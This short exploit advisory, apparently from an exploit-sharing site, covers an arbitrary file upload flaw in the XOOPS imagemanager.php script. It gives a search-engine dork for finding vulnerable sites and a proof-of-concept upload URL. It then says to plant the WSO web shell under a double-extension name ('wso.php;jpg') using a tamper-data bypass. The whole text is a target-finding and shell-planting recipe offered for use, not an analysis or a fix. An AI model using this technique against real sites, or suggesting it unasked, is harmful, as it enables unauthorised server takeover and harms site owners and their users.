XOOPS Arbitrary File Upload

Viewers : 0
Script = XOOPS

TYPE = Arbitrary File Upload

Dork = inurl:imagemanager.php?target=

Founder ; bRpsd =P

Skype; vegnox



Poc :

http://site.com/imagemanager.php?target=user_sig&op=upload&imgcat_id=1



Upload shell (Tamper data Bypass Required) ..

wso.php;jpg

Spesial Thanks To E4A